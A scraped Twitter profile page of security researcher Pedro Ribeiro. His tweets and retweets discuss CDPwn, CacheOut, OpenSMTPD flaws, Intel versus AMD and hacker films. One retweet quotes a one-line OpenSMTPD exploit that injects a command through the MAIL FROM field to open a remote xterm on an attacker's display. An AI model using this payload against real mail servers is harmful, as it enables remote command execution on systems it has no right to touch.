Twitter | Pretraživanje | |
Pedro Ribeiro
Reverse Engineer, Director of Research at Agile Information Security and member of Pwn2Own Flashback team. My pronouns are pwn/pwner.
305
Tweetovi
147
Pratim
668
Osobe koje vas prate
Tweetovi
Pedro Ribeiro 24 h
Odgovor korisniku/ci @irsdl @MDSecLabs @pwntester
Awesome!
Reply Retweet Označi sa "sviđa mi se"
Pedro Ribeiro 6. velj
Little things like "technical details" don't matter when you need an eye catching headline
Reply Retweet Označi sa "sviđa mi se"
Pedro Ribeiro 6. velj
Odgovor korisniku/ci @steventseeley
I think that's a problem as a researcher in general. The rabbit holes get smaller and smaller with ALSR and other protections, but as complexity increases we also get more of those holes
Reply Retweet Označi sa "sviđa mi se"
Pedro Ribeiro 5. velj
Odgovor korisniku/ci @campuscodi
The link to the cdpwn on their website seems to be dead
Reply Retweet Označi sa "sviđa mi se"
Pedro Ribeiro proslijedio/la je tweet
Catalin Cimpanu 5. velj
CDPwn vulnerabilities impact tens of millions of enterprise devices - CDPwn impacts Cisco's Discovery Protocol (CDP) - CDPwn = 4 RCEs + 1 DOS - LAN exploitable, not via WAN - ideal for escalating access and taking over entire networks
Reply Retweet Označi sa "sviđa mi se"
Pedro Ribeiro 30. sij
Odgovor korisniku/ci @AdamTheAnalyst
Doesn't beat The Matrix, but it's still better than Hackers
Reply Retweet Označi sa "sviđa mi se"
Pedro Ribeiro 30. sij
Odgovor korisniku/ci @zestexposed
Never seen it, but looks good! It's now on my list
Reply Retweet Označi sa "sviđa mi se"
Pedro Ribeiro 30. sij
Unpopular opinion: "Hackers" (1995) is a shit film, and the ultimate hacker film is "The Matrix" (1999)
Reply Retweet Označi sa "sviđa mi se"
Pedro Ribeiro proslijedio/la je tweet
Joxean Koret 30. sij
OpenBSD sEcUrE bY DeFaUlT exploit: MAIL FROM:<;xterm --display yourip:0;>
Reply Retweet Označi sa "sviđa mi se"
Pedro Ribeiro proslijedio/la je tweet
Ghidra Ninja 29. sij
If you are into C++ reverse engineering and never tried OOAnalyzer you are missing out big time!
Reply Retweet Označi sa "sviđa mi se"
Pedro Ribeiro 29. sij
Odgovor korisniku/ci @mjg59
Now if only Intel fixed their iommu - on some systems it is hopelessly broken and causes lots of crashes.
Reply Retweet Označi sa "sviđa mi se"
Pedro Ribeiro proslijedio/la je tweet
dragosr 29. sij
Old school, mail to shell script, code exec and privilege escalation in OpenSMTPD
Reply Retweet Označi sa "sviđa mi se"
Pedro Ribeiro proslijedio/la je tweet
D̒͂̕ᵈăᵃn̕ᶰ Ť̾̾̓͐͒͠ᵗe͗̑́̋̂́͡ᵉn̅ᶰtᵗl̀̓͘ᶫe̓̒̂̚ᵉrʳ 27. sij
can confirm. enable defender, crank it all the way up. as a redteamer, i can say its a pain in the ass to get around, so defenders should take advantage of that.
Reply Retweet Označi sa "sviđa mi se"
Pedro Ribeiro 27. sij
Very interesting - are you publishing a PoC?
Reply Retweet Označi sa "sviđa mi se"
Pedro Ribeiro 27. sij
Odgovor korisniku/ci @pedrib1337
“Moreover, CacheOut bypasses the hardware mitigations released by Intel in response to Meltdown, thereby necessitating additional software fixes."
Reply Retweet Označi sa "sviđa mi se"
Pedro Ribeiro 27. sij
Another nail in the coffin of Intel's supposed performance advantage: "AMD is not affected by CacheOut, as AMD does not offer any feature akin to Intel TSX on their current offering of CPUs.”
Reply Retweet Označi sa "sviđa mi se"
Pedro Ribeiro 27. sij
Reminder that if you're not paying, you're the product
Reply Retweet Označi sa "sviđa mi se"
Pedro Ribeiro 26. sij
Odgovor korisniku/ci @intoverflow @uffeux i 2 ostali
Than I'm definitely complaining to the right person
Reply Retweet Označi sa "sviđa mi se"
Pedro Ribeiro 26. sij
Odgovor korisniku/ci @intoverflow @uffeux i 2 ostali
And the problem is, either there aren't enough of those around, or companies don't want to pay for them.
Reply Retweet Označi sa "sviđa mi se"
Pedro Ribeiro 26. sij
Odgovor korisniku/ci @intoverflow @uffeux i 2 ostali
Just goes to show, you can model all you want, you will still get owned. Not saying it's not worth it, but definitely has to be supported by highly skilled "manual" pentesters.
Reply Retweet Označi sa "sviđa mi se"